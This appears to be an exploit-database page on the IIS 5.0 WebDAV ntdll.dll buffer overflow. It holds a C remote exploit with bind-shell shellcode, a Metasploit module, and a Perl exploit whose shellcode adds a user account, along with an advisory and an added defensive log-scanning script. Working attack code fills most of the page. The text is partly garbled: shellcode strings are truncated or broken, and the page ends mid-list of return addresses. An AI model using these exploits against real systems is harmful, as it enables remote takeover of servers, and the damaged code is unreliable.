  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
  "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
 
unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
              "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n"
              "</g:searchrequest>\r\n";
 
void usage(char *prog)
{
   printf("Remote Exploit for IIS 5.0 WebDAV by Xnuxer\n"
          "Bug overflow NTDLL.DLL\n"
          "Usage: %s <victim>\n", prog);
   exit(-1);
}
 
void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024];
 int n;
 
 while(1) {
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);
 
  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
 
  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }
 
  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock); 
}
 
int main(int argc, char **argv)
{
struct hostent *he;
struct sockaddr_in sock1;
struct sockaddr_in sock2;
unsigned short port;
unsigned long ret=RET;
char buffer[100000];
int sock, sck, h,i,j;
 
   if (argc != 2) usage(argv[0]);   
 
   printf("Resolving %s .. ", argv[1]);
   if ((he = gethostbyname(argv[1])) == NULL)
   {
      fprintf(stderr, "Unknown host\n");
      exit(-1);
   }
 
   printf("Resolved\n");
 
   port = htons(31337);
   port ^= 0x9999;
 
   *(unsigned short *)&shellcode[PORT_OFFSET] = port;
   *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
   *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
 
   bcopy(he->h_addr, &sock1.sin_addr, he->h_length);
   sock1.sin_family = AF_INET;
   sock1.sin_port = htons(80);
 
   printf("[+] Attacking to %s via port: 80\n", argv[1]);
 
   if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
      perror("Failed to create socket");
      exit(-1);
   }
 
   if (connect(sock, (struct sockaddr *)&sock1, sizeof(sock1)) == -1)
   {
      perror("Failed to connect");
      exit(-1);
   }
 
   bzero(buffer,100000);
   strcpy(buffer,"SEARCH /");
 
   i = strlen(buffer);
   buffer[i] = NOP;         
 
   for (j=i+1; j < i+2150; j+=2)
       *(unsigned short *)&buffer[j] = (unsigned short)ret;
 
   for (; j < i+65535-strlen(jumpcode); j++)
       buffer[j] = NOP;
 
   memcpy(&buffer[j], jumpcode, strlen(jumpcode));
   strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
   sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\n"
                                  "Content-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
   strcpy(buffer+strlen(buffer), body);
   memset(buffer+strlen(buffer), 0x01, 1);
   memset(buffer+strlen(buffer), NOP, 3);
   strcpy(buffer+strlen(buffer), shellcode);
 
   if (send(sock, buffer, strlen(buffer), 0) != strlen(buffer))
   {
      perror("Failed to send");
      exit(-1);
   }
 
   printf("[+] Overflow sent, waiting for 5 seconds\n");
   sleep(5);
 
   bcopy(he->h_addr, &sock2.sin_addr, he->h_length);
   sock2.sin_family = AF_INET;
   sock2.sin_port = htons(31337);
 
   printf("[+] Connecting to %s: 31337\n", argv[1]);
 
   if ((sck = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
      perror("Failed to create socket");
      exit(-1);
   }
 
   if (connect(sck, (struct sockaddr *)&sock2, sizeof(sock2)) == -1)
   {
      printf("[+] Unable to connect.\n"
             "[+] Exploitation failed, maybe blocked by firewall.\n");
      close(sock);
      close(sck);
      exit(-1);
   }
 
   close(sock);
   printf("[+] Successfull, attempting to join shell ...\n\n");
   shell(sck);
   return 0;           
}

// milw0rm.com [2003-07-08]
		

- Vulnerability information (16470)

Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow (EDBID:16470)
windows remote
2010-07-25 Verified
0 metasploit
N/A
##
# $Id: ms03_007_ntdll_webdav.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in NTDLL.dll on Windows 2000
				through the SEARCH WebDAV method in IIS. This particular
				module only works against Windows 2000. It should have a
				reasonable chance of success against any service pack.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2003-0109'],
					[ 'OSVDB', '4467'],
					[ 'BID', '7116'],
					[ 'MSB', 'MS03-007']
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic Brute Force', { } ],
				],
			'DisclosureDate' => 'May 30 2003',
			'DefaultTarget' => 0))

		register_evasion_options(
			[
				OptBool.new('invalid_search_request', [false, 'Replace the valid XML search with random data', 'false']),

				# XXX - ugh, there has to be a better way to remove entries from an
				# enum than overwriting the evalable enum option
				OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none','hex-normal'], 'none'])
			], self.class
		)

		deregister_options('HTTP::junk_params', 'HTTP::header_folding')
	end

	def autofilter
		# Common vulnerability scanning tools report port 445/139
		# due to how they test for the vulnerability. Remap this
		# back to 80 for automated exploitation

		rport = datastore['RPORT'].to_i
		if ( rport == 139 or rport == 445 )
			rport = 80
		end

		true
	end

	def check
		url = 'x' * 65535
		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"

		response = send_request_cgi({
			'uri'     => '/' + url,
			'ctype'   => 'text/xml',
			'method'  => 'SEARCH',
			'data'    => xml
		}, 5)


		if (response and response.body =~ /Server Error\(exception/)
			return Exploit::CheckCode::Vulnerable
		end

		# Did the server stop accepting requests?
		begin
			send_request_raw({'uri' => '/'}, 5)
		rescue
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		# verify the service is running up front
		send_request_raw({'uri' => '/'}, 5)

		# The targets in the most likely order they will work
		targets =
		[
			# Almost Targeted :)
			"\x4f\x4e", # =SP3
			"\x41\x42", # ~SP0  ~SP2
			"\x41\x43", # ~SP1, ~SP2

			# Generic Bruteforce
			"\x41\xc1",
			"\x41\xc3",
			"\x41\xc9",
			"\x41\xca",
			"\x41\xcb",
			"\x41\xcc",
			"\x41\xcd",
			"\x41\xce",
			"\x41\xcf",
			"\x41\xd0",
		]

		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"

		if datastore['invalid_search_request'] == true
			xml = rand_text(rand(1024) + 32)
		end

		# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
		# This decodes to "inc ecx"

		url = 'A' * 65516
		url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded

		targets.each { |ret|

			print_status("Trying return address 0x%.8x..." % Rex::Text.to_unicode(ret).unpack('V')[0])
			url[ 283, 2 ] = ret

			begin
				send_request_cgi({
					'uri'     => '/' + url,
					'ctype'   => 'text/xml',
					'method'  => 'SEARCH',
					'data'    => xml
				}, 5)
				handler
			rescue => e
				print_error("Attempt failed: #{e}")
			end

			1.upto(8) { |i|
				select(nil,nil,nil,0.25)
				return if self.session_created?
			}

			if !service_running?
				print_error('Giving up, IIS must have completely crashed')
				return
			end
		}
	end

	# Try connecting to the server up to 20 times, with a two second gap
	# This gives the server time to recover after a failed exploit attempt
	def service_running?
		print_status('Checking if IIS is back up after a failed attempt...')
		1.upto(20) {|i|
			begin
				send_request_raw({'uri' => '/'}, 5)
			rescue
				print_error("Connection failed (#{i} of 20)...")
				select(nil,nil,nil,2)
				next
			end
			return true
		}
		return false
	end

end
		

- Vulnerability information (22365)

Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) (EDBID:22365)
windows remote
2003-03-24 Verified
0 Mat
N/A
source: http://www.securityfocus.com/bid/7116/info

The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker. 

Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.

** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP also does not include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.

** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.

** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.

** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.
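The ntdll.dll bounds-checking flaw described above is reached through WebDAV requests whose path is close to 64 KB long (the listings on this page use URL lengths between 65514 and 65535 bytes, mostly filled with one repeated byte). As an added example that is not part of the original page or of any exploit shown on it, the following Python scans IIS W3C extended log lines for WebDAV methods with abnormally long request paths and for long runs of a single repeated byte. The field layout, the sample log lines and both thresholds are constructed assumptions; adjust them to the logging configuration of the server being reviewed.

```python
# Added example (not part of the original page or of any exploit on it):
# flag WebDAV requests with abnormally long URIs in IIS W3C extended log lines.
# The field layout, sample lines and thresholds below are constructed assumptions.
from dataclasses import dataclass
from typing import Iterable, List, Optional

# WebDAV methods handled by the IIS 5.0 WebDAV component (beyond plain HTTP verbs).
WEBDAV_METHODS = {"SEARCH", "PROPFIND", "PROPPATCH", "LOCK", "UNLOCK", "MKCOL", "COPY", "MOVE"}
URI_LENGTH_LIMIT = 1024   # assumed: legitimate WebDAV paths are far shorter than this
REPEAT_RUN_LIMIT = 256    # assumed: a run of one repeated byte this long is a sled, not a path


@dataclass
class Finding:
    line_no: int
    client: str
    method: str
    uri_len: int
    reason: str


def parse_fields(header: str) -> List[str]:
    """Turn a '#Fields: a b c' directive into the column names of following lines."""
    if not header.startswith("#Fields:"):
        raise ValueError("not a #Fields directive")
    return header.split()[1:]


def longest_run(s: str) -> int:
    """Length of the longest run of a single repeated character in s."""
    best = cur = 0
    prev: Optional[str] = None
    for ch in s:
        cur = cur + 1 if ch == prev else 1
        best = max(best, cur)
        prev = ch
    return best


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per suspicious request; line numbers are 1-based."""
    fields: Optional[List[str]] = None
    findings: List[Finding] = []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = parse_fields(line)   # the layout can change mid-file
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue   # malformed line: skip rather than guess column positions
        rec = dict(zip(fields, parts))
        method = rec.get("cs-method", "")
        stem = rec.get("cs-uri-stem", "")
        reasons = []
        if method in WEBDAV_METHODS and len(stem) > URI_LENGTH_LIMIT:
            reasons.append("webdav-long-uri")
        if longest_run(stem) >= REPEAT_RUN_LIMIT:
            reasons.append("repeated-byte-sled")
        if reasons:
            findings.append(Finding(n, rec.get("c-ip", "?"), method, len(stem), ",".join(reasons)))
    return findings


# Constructed sample log in W3C extended format (not real traffic).
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 5.0",
    "#Version: 1.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2003-03-24 10:15:01 192.0.2.10 GET /default.htm - 200",
    "2003-03-24 10:15:07 192.0.2.10 PROPFIND /docs/ - 207",
    "2003-03-24 10:16:42 192.0.2.77 SEARCH /" + "A" * 2000 + " - 500",
    "2003-03-24 10:16:44 192.0.2.77 GET /" + "x" * 4000 + " - 404",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client} {f.method} uri_len={f.uri_len} [{f.reason}]")
```

Two caveats when using this on a real server: IIS buffers log writes, so the request that actually crashed the process may never reach the log file and network-level capture is the complementary source; and a long-URI heuristic only detects attempts, so it supplements rather than replaces the Q815021 patch the advisory above refers to.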

#!/bin/perl
#
# 2003.3.24
#
# mat@monkey.org
# mat@panicsecurity.org
#
# tested on Windows 2000 Advanced Server SP3: Korean language edition
# ntdll.dll with 2002.7.3 version
# You need to change some parameters to make this exploit work on your platform of choice
#
# This exploit uses unicode decoder scheme and self-modifies unicoded shellcode to original one.
#

use Socket;

if($#ARGV<0)
{
        die "usage: wd.pl <target hostname>\n";
}

my $host=$ARGV[0];

my $url_len=65514;
#LOCK: 65514
#SEARCH: 65535

my $host_header="Host: $host\r\n";
my $translate_f="Translate: f\r\n";
$translate_f="";
my $port=80;
my $depth="Depth: 1\r\n";
$depth="";
my $connection_str="Connection: Close\r\n";
$connection_str="";
my $url2="B";
$url2="";
my $cont="C";
my $lock_token="Lock-Token: $cont\r\n";
$lock_token="";
my $destination="Destination: /$url2\r\n";
$destination="";

# LoadLibrary: 0x100107c;
# GetProcAddress 0x1001034;
# WinExec("net user matt 1234 /ADD")
# this shellcode is encoded to printable string form
my $shellcode="\x34\x34\x30\x2e\x2c\x2a\x61\x62\x48\x48\x2a\x2a\x2c\x2d\x7f\x80\x68\x69\x2c\x2c\x18\x19\x64\x65\x58\x59\x0c\x07%u0411%u00f0\x67\x67\x2c\x2a\x31\x2e\x18\x19\x64\x65\x58\x59\x7e\x7f\x56\x56\x1a\x1a\x4c\x4d\x55\x55\x71\x71\x7d\x7d\x38\x39\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x62\x62\x0c\x0c\x3b\x39\x4e\x4e\x6c\x6d\x6c\x6d\x4c\x4d\x38\x38\x5f\x60\x4c\x4d\x4c\x4d\x4c\x4d\x64\x64\x67\x68\x78\x79\x72\x73\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x08\x08\x2d\x2d\x60\x60\x08\x08\x33\x34\x64\x64\x67\x68\x65\x65\x78\x79\x56\x57\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x64\x65\x1a\x1b\x0e\x0f\x2c\x2d\x76\x76\x31\x31\x60\x61\x19\x19\x60\x60\x3d\x3e\x3b\x38\x2d\x2d\x0c\x08\x16\x16\x07\x08\x6c\x6d\x6c\x6d\x4c\x4d\x0c\x08\x12\x12\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x79\x7a\x4f\x50\x60\x60\x38\x39\x31\x2e\x33\x33\x33\x33\x33\x33\x54\x54\x27\x24\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x29\x29\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x16\x16\x38\x38\x6c\x6d\x6c\x6d\x4c\x4d\x08\x08\x39\x39\x0c\x0c\x2d\x2d\x3b\x39\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x64\x65\x08\x08\x2d\x2d\x33\x33\x06\x06\x1d\x1d\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x33\x33\x06\x06\x1f\x1f\x6c\x6d\x6c\x6d\x4c\x4d\x54\x54\x27\x24\x04\x05\x04\x05\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x27\x27\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x19\x19\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x06\x06\x1b\x1b\x6c\x6d\x6c\x6d\x4c\x4d\x69\x69\x6e\x6e\x65\x66\x6b\x6c\x6e\x6e\x6a\x6b\x55\x55\x55\x56\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x75\x76\x7e\x7e\x7c\x7c\x76\x77\x4c\x4d\x63\x63\x7a\x7b\x77\x77\x75\x76\x78\x78\x76\x77\x7e\x7e\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x7a\x7b\x7b\x7b\x75\x75\x7e\x7e\x4c\x4d\x67\x67\x78\x78\x7b\x7c\x6e\x6e\x70\x71\x7e\x7e\x7d\x7d\x4c\x4d\x6e\x6e\x70\x71\x78\x78\x76\x77\x64\x65\x75\x76\x7b\x7b\x7d\x7d\x7e\x7e\x75\x75\x75\x75\x4c\x4d\x7d\x7d\x51\x52\x62\x63\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x7b\x7c\x7e\x7e\x76\x77\x5e\x5b\x76\
x76\x75\x75\x7e\x7e\x75\x76\x5e\x5b\x7a\x7a\x7c\
5\x56\x57\x5e\x5b\x5b\x5b\x7c\x7c\x7e\x7f\x7e\x7f\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4e\x4e\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x7e\x7e\x75\x75\x76\x77\x49\x4a";

my $body="<?xml version=\"1.0\">\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
my $length_of_body=length($body);

#
# jmp ebx,call ebx addresses
#
my @return_addresses=(
 "%u32ac%u77e2",
 "%uc1b5%u76ae",
 "%u005d%u77a5",
 "%u0060%u776b",
 "%u00b4%u77a5",
 "%u00e6%u77ac",
 "%u014a%u7766",
 "%u0392%u7511",
 "%u03a0%u7511",
 "%u0900%u6df1",
 "%u0900%u778b",
 "%u1167%u6b32",
 "%u1184%u6ed4",
 "%u1192%u6b3e",
 "%u11b1%u779e",
 "%u11b9%u777f",
 "%u11b9%u782c",
 "%u11d3%u7834",
 "%u1800%u749e",
 "%u20ac%u777f",
 "%u215c%u777e",
 "%u2171%u7766",
 "%u2172%u6b3a",
 "%u2191%u6e6f",
 "%u21d4%u6e6f",
 "%u2283%u730a",
 "%u24b9%u7763",
 "%u24d5%u7763",
 "%u24e8%u7761",
 "%u2503%u7834",
 "%u2514%u77e2",
 "%u251e%u77db",
 "%u2521%u7761",
 "%u2527%u77db",
 "%u2530%u77db",
 "%u253c%u77e2",
 "%u2547%u77dc",
 "%u2592%u77dc",
 "%u266d%u76ae",
 "%u2e00%u76ae",
 "%u300e%u74da",
 "%u300e%u74e3",
 "%u306c%u7766",
 "%u30a5%u77e5",
 "%u30b0%u77e5",
 "%u327b%u6e44",
 "%u327b%u6e5e",
 "%u329b%u6e44",
 "%u329b%u6e5e",
 "%u329c%u77e2",
 "%u3384%u7779",
 "%u3384%u777e",
 "%u3397%u6e00",
 "%u33d0%u76ae",
 "%u3700%u777f",
 "%u4e5e%u7900",
 "%u4ea4%u7325",
 "%u4ec0%u77db",
 "%u4ef2%u77ac",
 "%u4f73%u749f",
 "%u4fd4%u77dc",
 "%u4ff1%u749f",
 "%u5023%u749f",
 "%u5078%u77a5",
 "%u5112%u77dc",
 "%u5121%u749f",
 "%u5144%u77dc",
 "%u5146%u77e2",
 "%u514e%u77ac",
 "%u518d%u6dee",
 "%u51c4%u7387",
 "%u5237%u77ac",
 "%u52a0%u777f",
 "%u52a0%u782c",
 "%u52d5%u777f",
 "%u52d5%u782c",
 "%u52f8%u7800",
 "%u5339%u6b3a",
 "%u5339%u777f",
 "%u5366%u7740",
 "%u555e%u741b",
 "%u5653%u749e",
 "%u5718%u6c7e",
 "%u574d%u7901",
 "%u5775%u7901",
 "%u5806%u7325",
 "%u5821%u777f",
 "%u5821%u782c",
 "%u5831%u777f",
 "%u5831%u782c",
 "%u587c%u777f",
 "%u587c%u782c",
 "%u58c5%u777f",
 "%u58d5%u777f",
 "%u58fd%u777f",
 "%u58fd%u782c",
 "%u5949%u72fc",
 "%u5949%u777f",
 "%u5955%u72fc",
 "%u5967%u777f",
 "%u5997%u777f",
 "%u5997%u782c",
 "%u59bb%u777e",
 "%u59d4%u777e",
 "%u5a25%u777f",
 "%u5a25%u782c",
 "%u5ac9%u777f",
 "%u5b5a%u6c7e",
 "%u5b64%u777f",
 "%u5b8f%u6731",
 "%u5b9c%u6731",
 "%u5b9c%u6e44",
 "%u5c04%u777f",
 "%u5c0f%u6c7e",
 "%u5c3b%u777f",
 "%u5c3b%u782c",
 "%u5c4e%u6c7e",
 "%u5cfb%u76ae",
 "%u5da0%u7511",
 "%u5da2%u777f",
 "%u5de6%u77e5",
 "%u5deb%u777f",
 "%u5deb%u782c",
 "%u5e00%u6c11",
 "%u5e0c%u7325",
 "%u5e2b%u777f",
 "%u5e3f%u7511",
 "%u5e55%u777f",
 "%u5e63%u7325",
 "%u5eb8%u7325",
 "%u5ef7%u7325",
 "%u5f13%u7325",
 "%u5f17%u77e3",
 "%u5f1b%u777f",
 "%u5f1b%u782c",
 "%u5f62%u7325",
 "%u5f7f%u72fc",
 "%u5f99%u7325",
 "%u5fb7%u6c11",
 "%u5fcc%u7763",
 "%u601d%u77dc",
 "%u609a%u7387",
 "%u60f6%u72fc",
 "%u611f%u77bf",
 "%u6144%u74da",
 "%u6144%u74e3",
 "%u6198%u7763",
 "%u61a9%u74da",
 "%u61a9%u74e3",
 "%u61fa%u66c7",
 "%u61fa%u671b",
 "%u620a%u7325",
 "%u6284%u66c7",
 "%u62c8%u7763",
 "%u62db%u72fc",
 "%u62f1%u72fc",
 "%u63a9%u77bc",
 "%u63ed%u779e",
 "%u64bb%u7761",
 "%u64c1%u72fd",
 "%u64e2%u777f",
 "%u64e2%u782c",
 "%u64f4%u777f",
 "%u65b9%u6ed4",
 "%u6600%u6ed4",
 "%u66a0%u6c6d",
 "%u66b3%u6c6d",
 "%u66f3%u6c6d",
 "%u66f8%u7387",
 "%u674f%u7763",
 "%u67b0%u7740",
 "%u67b3%u6ed4",
 "%u67d2%u749e",
 "%u6816%u6ed4",
 "%u6842%u779e",
 "%u6881%u779e",
 "%u6894%u779e",
 "%u68b3%u777e",
 "%u6977%u76ae",
 "%u6a19%u7763",
 "%u6a44%u7763",
 "%u6aa3%u7518",
 "%u6c60%u77bc",
 "%u6c81%u7693",
 "%u6c82%u77bf",
 "%u6c92%u77bc",
 "%u6cb8%u7693",
 "%u6cdb%u777f",
 "%u6ce5%u777f",
 "%u6ceb%u7693",
 "%u6d11%u777f",
 "%u6d11%u782c",
 "%u6d87%u77dc",
 "%u6d89%u7693",
 "%u6e2f%u7693",
 "%u6e4d%u76ae",
 "%u6f94%u77e9",
 "%u6fae%u77bc",
 "%u6fe9%u749e",
 "%u7006%u77e9",
 "%u7028%u7901",
 "%u70ab%u77ac",
 "%u70ac%u7387",
 "%u70dd%u77ac",
 "%u70dd%u784f",
 "%u70fd%u77bb",
 "%u711a%u6731",
 "%u7199%u7387",
 "%u71d0%u77bb",
 "%u71fc%u77bb",
 "%u722d%u6df3",
 "%u7258%u7515",
 "%u725f%u77db",
 "%u72a2%u77a5",
 "%u72c4%u7325",
 "%u73fe%u6ed4",
 "%u745f%u76ae",
 "%u748b%u730a",
 "%u74d8%u6df3",
 "%u74e3%u6df3",
 "%u7575%u7518",
 "%u7642%u6c0f",
 "%u76de%u7325",
 "%u7704%u7325",
 "%u77dc%u7693",
 "%u78a9%u77e2",
 "%u78bb%u77bb",
 "%u790e%u6995",
 "%u797a%u6995",
 "%u79b1%u6995",
 "%u79b1%u7740",
 "%u79d1%u77bb",
 "%u79e7%u6995",
 "%u79e9%u72fd",
 "%u7a00%u78fb",
 "%u7a05%u72fd",
 "%u7a3b%u72fd",
 "%u7a57%u7387",
 "%u7aba%u6995",
 "%u7af9%u6c13",
 "%u7b19%u76ae",
 "%u7b6e%u777f",
 "%u7b6e%u782c",
 "%u7c83%u7763",
 "%u7c97%u7763",
 "%u7ca5%u7763",
 "%u7d8f%u77e5",
 "%u7dbe%u779e",
 "%u7de1%u779e",
 "%u7e1f%u6df1",
 "%u7e1f%u778b",
 "%u7e52%u6995",
 "%u7f55%u77a5",
 "%u7fa8%u77a5",
 "%u7fd5%u76ae",
 "%u8018%u775b",
 "%u807d%u7387",
 "%u80a5%u775b",
 "%u8178%u775b",
 "%u81c0%u77db",
 "%u82ad%u6c11",
 "%u82d5%u65f1",
 "%u832f%u77db",
 "%u8339%u76ae",
 "%u83d3%u6df3",
 "%u843d%u7387",
 "%u8563%u77ac",
 "%u8805%u7740",
 "%u881f%u77db",
 "%u8840%u77bc",
 "%u8892%u7740",
 "%u8892%u77ac",
 "%u8a23%u6731",
 "%u8a23%u7693",
 "%u8a23%u77ad",
 "%u8af1%u76ae",
 "%u8b17%u6ed4",
 "%u8b39%u76ae",
 "%u8c6b%u77bf",
 "%u8c7a%u77bc",
 "%u8ca2%u77bc",
 "%u8cac%u6df1",
 "%u8cac%u778b",
 "%u8d70%u6995",
 "%u8dbe%u7740",
 "%u8dcb%u77ad",
 "%u8dcf%u777e",
 "%u8e87%u6995",
 "%u8f09%u6b32",
 "%u9187%u76ae",
 "%u925e%u749e",
 "%u92f8%u77ad",
 "%u932e%u76ae",
 "%u93ac%u7740",
 "%u9640%u6995",
 "%u980a%u7763",
 "%u984e%u6df3",
 "%u985e%u7763",
 "%u98dc%u7740",
 "%u9920%u7916",
 "%u9957%u77a5",
 "%u9a5a%u779e",
 "%u9b27%u6ed3",
 "%u9cf6%u7518",
 "%u9d26%u7518",
 "%u9d5d%u7300",
 "%u9d72%u7763",
 "%u9edc%u7901",
 "%u9ede%u77e9",
 "%ua300%u76ae",
 "%uac16%u7900",
 "%uac17%u77db",
 "%uac17%u7832",
 "%uac4b%u77db",
 "%uac4b%u7900",
 "%uac52%u76ae",
 "%uac5a%u76ae",
 "%uac71%u7693",
 "%uac84%u77e9",
 "%uac97%u77e3",
 "%uaca2%u6ed3",
 "%uaca4%u6c0f",
 "%uaca4%u77e9",
 "%uacac%u6c0f",
 "%uacaf%u77e3",
 "%uacb6%u6ed3",
 "%uacc8%u7693",
 "%uace0%u7761",
 "%uacfb%u7761",
 "%uad0d%u77e2",
 "%uad13%u7900",
 "%uad18%u779e",
 "%uad25%u7900",
 "%uad27%u6ed3",
 "%uad45%u77e2",
 "%uad5b%u7900",
 "%uad5f%u7387",
 "%uad73%u6995",
 "%uad73%u6b32",
 "%uad7a%u6b32",
 "%uada6%u775b",
 "%uadab%u7900",
 "%uadc4%u7387",
 "%uadf0%u76ae",
 "%uadf9%u6995",
 "%uae12%u76ae",
 "%uae80%u77e5",
 "%uae96%u77e5",
 "%uaf17%u77e3",
 "%uafa2%u779e",
 "%ub00a%u77e5",
 "%ub05d%u77e5",
 "%ub0c0%u6b32",
 "%ub0ef%u7518",
 "%ub100%u6b32",
 "%ub100%u7518",
 "%ub119%u7518",
 "%ub138%u672e",
 "%ub169%u6b32",
 "%ub177%u672e",
 "%ub181%u6b32",
 "%ub1cb%u6ed4",
 "%ub1da%u6ed4",
 "%ub206%u6b32",
 "%ub216%u6c0f",
 "%ub23f%u7802",
 "%ub240%u7693",
 "%ub246%u6c0f",
 "%ub260%u7693",
 "%ub273%u76ae",
 "%ub276%u6c0f",
 "%ub27e%u779e",
 "%ub288%u76ae",
 "%ub293%u77e2",
 "%ub29c%u72fd",
 "%ub2a3%u6c0f",
 "%ub2b7%u72fd",
 "%ub2ca%u77e2",
 "%ub2ef%u76ae",
 "%ub342%u76ae",
 "%ub3a2%u749e",
 "%ub3b8%u749e",
 "%ub3be%u749e",
 "%ub3c3%u741b",
 "%ub3f4%u741b",
 "%ub405%u7802",
 "%ub43a%u76ae",
 "%ub44e%u6df1",
 "%ub44e%u778b",
 "%ub450%u76ae",
 "%ub456%u6df1",
 "%ub456%u778b",
 "%ub468%u6ed3",
 "%ub483%u76ae",
 "%ub484%u72fd",
 "%ub48b%u72fd",
 "%ub498%u76ae",
 "%ub4a6%u6995",
 "%ub4af%u76ae",
 "%ub4c0%u76ae",
 "%ub4e8%u7832",
 "%ub52d%u6995",
 "%ub549%u77db",
 "%ub554%u6995",
